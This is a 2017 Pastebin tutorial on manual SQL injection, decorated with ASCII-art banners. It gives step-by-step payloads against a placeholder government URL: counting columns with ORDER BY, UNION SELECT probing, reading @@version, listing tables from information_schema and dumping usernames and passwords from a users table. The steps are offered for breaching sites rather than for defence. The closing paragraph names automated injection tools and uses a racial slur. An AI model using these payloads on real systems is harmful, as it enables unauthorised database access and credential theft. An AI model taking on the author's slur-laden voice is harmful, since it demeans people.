Advertisement
Stipulating

Manual SQL Injecting

Jul 27th, 2017
73
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.10 KB | None | 0 0
  1. ██╗ ██╗ ██████╗ ██╗ ██╗
  2. ██║ ██║██╔═══██╗██║ ██║
  3. ███████║██║ ██║██║ █╗ ██║
  4. ██╔══██║██║ ██║██║███╗██║
  5. ██║ ██║╚██████╔╝╚███╔███╔╝
  6. ╚═╝ ╚═╝ ╚═════╝ ╚══╝╚══╝
  7.  
  8. ████████╗ ██████╗
  9. ╚══██╔══╝██╔═══██╗
  10. ██║ ██║ ██║
  11. ██║ ██║ ██║
  12. ██║ ╚██████╔╝
  13. ╚═╝ ╚═════╝
  14.  
  15. ███╗ ███╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ██╗
  16. ████╗ ████║██╔══██╗████╗ ██║██║ ██║██╔══██╗██║
  17. ██╔████╔██║███████║██╔██╗ ██║██║ ██║███████║██║
  18. ██║╚██╔╝██║██╔══██║██║╚██╗██║██║ ██║██╔══██║██║
  19. ██║ ╚═╝ ██║██║ ██║██║ ╚████║╚██████╔╝██║ ██║███████╗
  20. ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝
  21.  
  22. ███████╗ ██████╗ ██╗ ██╗███╗ ██╗ ██╗███████╗ ██████╗████████╗
  23. ██╔════╝██╔═══██╗██║ ██║████╗ ██║ ██║██╔════╝██╔════╝╚══██╔══╝
  24. ███████╗██║ ██║██║ ██║██╔██╗ ██║ ██║█████╗ ██║ ██║
  25. ╚════██║██║▄▄ ██║██║ ██║██║╚██╗██║██ ██║██╔══╝ ██║ ██║
  26. ███████║╚██████╔╝███████╗ ██║██║ ╚████║╚█████╔╝███████╗╚██████╗ ██║
  27. ╚══════╝ ╚══▀▀═╝ ╚══════╝ ╚═╝╚═╝ ╚═══╝ ╚════╝ ╚══════╝ ╚═════╝ ╚═╝
  28.  
  29.  
  30.  
  31.  
  32. .---------------------------_______
  33. /''''''''''(______O] ----------____ \______/]_
  34. __...---'"""\_ --'' / FUCK ISIS ___________@ - - - - - - - (manual sql injecting)
  35. |''' ._ _______________----------"""""""
  36. | ..--''| | ) |_| |
  37. | ..--'' . /-___| ' '
  38. | ..--'' / , ' '
  39. |--'' / , ` \
  40. |__' \ -
  41. - '-.
  42. '. /
  43. '-./
  44.  
  45. ██████████████████████████████████████████████████
  46. ╔═╗┬─┐┌─┐┌┬┐┬┌┬┐┌─┐
  47. ║ ├┬┘├┤ │││ │ └─┐
  48. ╚═╝┴└─└─┘─┴┘┴ ┴ └─┘
  49.  
  50. http://twitter.com/urbackdoored
  51. ██████████████████████████████████████████████████
  52. ╔╦╗┌─┐┌┐ ┬ ┌─┐ ┌─┐┌─┐ ╔═╗┌─┐┌┐┌┌┬┐┌─┐┌┐┌┌┬┐┌─┐
  53. ║ ├─┤├┴┐│ ├┤ │ │├┤ ║ │ ││││ │ ├┤ │││ │ └─┐
  54. ╩ ┴ ┴└─┘┴─┘└─┘ └─┘└ ╚═╝└─┘┘└┘ ┴ └─┘┘└┘ ┴ └─┘
  55.  
  56. 1.) [Finding SQL Injectable sites]
  57. 2.) [Retrieving columns]
  58. 3.) [Retrieving vulnerable columns]
  59. 4.) [Checking for the type of MySQL version]
  60. 5.) [Retrieving table names]
  61. 7.) [Retrieving data from columns]
  62. 8.) [Automatically SQL injecting]
  63.  
  64. ██████████████████████████████████████████████████
  65. ╔═╗┬┌┐┌┌┬┐┬┌┐┌┌─┐ ╔═╗╔═╗ ╦ ┬┌┐┌ ┬┌─┐┌─┐┌┬┐┌─┐┌┐ ┬ ┌─┐
  66. ╠╣ ││││ │││││││ ┬ ╚═╗║═╬╗║ ││││ │├┤ │ │ ├─┤├┴┐│ ├┤
  67. ╚ ┴┘└┘─┴┘┴┘└┘└─┘ ╚═╝╚═╝╚╩═╝ ┴┘└┘└┘└─┘└─┘ ┴ ┴ ┴└─┘┴─┘└─┘
  68. ┌─┐┬┌┬┐┌─┐┌─┐
  69. └─┐│ │ ├┤ └─┐
  70. └─┘┴ ┴ └─┘└─┘
  71.  
  72. Please i god forbid using "google dorks" for a beginner its even bad!
  73. There are plenty of SQL injection scanners developed in C, C++, C#, perl,
  74. python, java, & php. using google dorks at this point should not be your
  75. course.
  76.  
  77.  
  78. ██████████████████████████████████████████████████
  79.  
  80. ┬─┐┌─┐┌┬┐┬─┐┬┌─┐┬ ┬┬┌┐┌┌─┐ ┌─┐┌─┐┬ ┬ ┬┌┬┐┌┐┌┌─┐
  81. ├┬┘├┤ │ ├┬┘│├┤ └┐┌┘│││││ ┬ │ │ ││ │ │││││││└─┐
  82. ┴└─└─┘ ┴ ┴└─┴└─┘ └┘ ┴┘└┘└─┘ └─┘└─┘┴─┘└─┘┴ ┴┘└┘└─┘
  83.  
  84. Your payload will be; +order+by+(number)--
  85.  
  86. Note; your "number" can be changed from 1-15 wait until it shows an error.
  87.  
  88. It will look like; http://fuckfbi.gov/hacked.php?id=420+order+by+(1)--
  89.  
  90.  
  91.  
  92. ██████████████████████████████████████████████████
  93. ┬─┐┌─┐┌┬┐┬─┐┬┌─┐┬ ┬┬┌┐┌┌─┐ ┬ ┬┬ ┬┬ ┌┐┌┌─┐┬─┐┌─┐┌┐ ┬ ┌─┐
  94. ├┬┘├┤ │ ├┬┘│├┤ └┐┌┘│││││ ┬ └┐┌┘│ ││ │││├┤ ├┬┘├─┤├┴┐│ ├┤
  95. ┴└─└─┘ ┴ ┴└─┴└─┘ └┘ ┴┘└┘└─┘ └┘ └─┘┴─┘┘└┘└─┘┴└─┴ ┴└─┘┴─┘└─┘
  96. ┌─┐┌─┐┬ ┬ ┬┌┬┐┌┐┌┌─┐
  97. │ │ ││ │ │││││││└─┐
  98. └─┘└─┘┴─┘└─┘┴ ┴┘└┘└─┘
  99.  
  100.  
  101. Your payload; +union+select+1,2,3,4--
  102.  
  103. Note; 1,2,3,4 should be change the the column your found with the payload "+order+by+(number)--"
  104.  
  105. Note; in the "id=420" in your link you will need to change the numbers to "null"
  106.  
  107. It will look like; http://fuckfbi.gov/hacked.php?id=null+union+select+1,2,3,4--
  108.  
  109.  
  110. ██████████████████████████████████████████████████
  111. ┌─┐┬ ┬┌─┐┌─┐┬┌─┬┌┐┌┌─┐ ┌─┐┌─┐┬─┐ ╔╦╗┬ ┬╔═╗╔═╗ ╦
  112. │ ├─┤├┤ │ ├┴┐│││││ ┬ ├┤ │ │├┬┘ ║║║└┬┘╚═╗║═╬╗║
  113. └─┘┴ ┴└─┘└─┘┴ ┴┴┘└┘└─┘ └ └─┘┴└─ ╩ ╩ ┴ ╚═╝╚═╝╚╩═╝
  114. ┬ ┬┌─┐┬─┐┌─┐┬┌─┐┌┐┌
  115. └┐┌┘├┤ ├┬┘└─┐││ ││││
  116. └┘ └─┘┴└─└─┘┴└─┘┘└┘
  117.  
  118. Your payload; @@version--
  119.  
  120. Note; you will need the link you was just trying to retrieve the vulnerable columns
  121.  
  122. It will look like; http://fuckfbi.gov/hacked.php?id=null+union+select+1,2,3,@@version--
  123.  
  124. Note; Replace the vulnerable column number with our payload
  125.  
  126.  
  127. ██████████████████████████████████████████████████
  128. ┬─┐┌─┐┌┬┐┬─┐┬┌─┐┬ ┬┬┌┐┌┌─┐ ┌┬┐┌─┐┌┐ ┬ ┌─┐
  129. ├┬┘├┤ │ ├┬┘│├┤ └┐┌┘│││││ ┬ │ ├─┤├┴┐│ ├┤
  130. ┴└─└─┘ ┴ ┴└─┴└─┘ └┘ ┴┘└┘└─┘ ┴ ┴ ┴└─┘┴─┘└─┘
  131. ┌┐┌┌─┐┌┬┐┌─┐┌─┐
  132. │││├─┤│││├┤ └─┐
  133. ┘└┘┴ ┴┴ ┴└─┘└─┘
  134.  
  135.  
  136. Your payload; group_concat(table_name,0x0a)+from+informati?on_schema.tables+where+table_schema=database()--
  137.  
  138. Note; you will need the link from checking for mysql version
  139.  
  140. It will look like; http://fuckfbi.gov/hacked.php?id=null+union+select+1,2,3,group_concat(table_name,0x0a)+from+informati?on_schema.tables+where+table_schema=database()--
  141.  
  142. Note; replace the "@@version--" payload with ours
  143.  
  144.  
  145.  
  146. ██████████████████████████████████████████████████
  147. ╦═╗┌─┐┌┬┐┬─┐┬┌─┐┬ ┬┬┌┐┌┌─┐ ┌┬┐┌─┐┌┬┐┌─┐
  148. ╠╦╝├┤ │ ├┬┘│├┤ └┐┌┘│││││ ┬ ││├─┤ │ ├─┤
  149. ╩╚═└─┘ ┴ ┴└─┴└─┘ └┘ ┴┘└┘└─┘ ─┴┘┴ ┴ ┴ ┴ ┴
  150. ┌─┐┬─┐┌─┐┌┬┐ ┌─┐┌─┐┬ ┬ ┬┌┬┐┌┐┌┌─┐
  151. ├┤ ├┬┘│ ││││ │ │ ││ │ │││││││└─┐
  152. └ ┴└─└─┘┴ ┴ └─┘└─┘┴─┘└─┘┴ ┴┘└┘└─┘
  153.  
  154.  
  155. Your payload; 1,group_concat(ID,0x3a,username,0x3a,password,0x0??a),3,4,5,6,7,8,9,10,11,12,13+from+users--
  156.  
  157. Note; "users" will need to be changed to the database with juicy information you want. and it will display it on the webpage.
  158.  
  159. It will look like; null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0??a),3,4,5,6,7,8,9,10,11,12,13+from+users--
  160.  
  161. Note; At this point you should have learned manual sql injecting, It's the easiest method of a tutorial a could make.
  162.  
  163.  
  164.  
  165. ██████████████████████████████████████████████████
  166. ╔═╗┬ ┬┌┬┐┌─┐┌┬┐┌─┐┌┬┐┬┌─┐┌─┐┬ ┬ ┬ ┬ ╔═╗╔═╗ ╦
  167. ╠═╣│ │ │ │ ││││├─┤ │ ││ ├─┤│ │ └┬┘ ╚═╗║═╬╗║
  168. ╩ ╩└─┘ ┴ └─┘┴ ┴┴ ┴ ┴ ┴└─┘┴ ┴┴─┘┴─┘┴ ╚═╝╚═╝╚╩═╝
  169. ┬┌┐┌ ┬┌─┐┌─┐┌┬┐┬┌┐┌┌─┐
  170. ││││ │├┤ │ │ │││││ ┬
  171. ┴┘└┘└┘└─┘└─┘ ┴ ┴┘└┘└─┘
  172.  
  173. There are programs such as SQLMAP, Havij, SQLNinja, & DBDROP that will automatically breach the database for you.
  174. But learning the original way is always best for knowledge of what's happening.
  175. If you're that nigger whom is a leach & a skid you can go on & use it automatically but when someone asks about your
  176. knowledge on it don't come back to my tutorial LOL. -Chris Poole
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement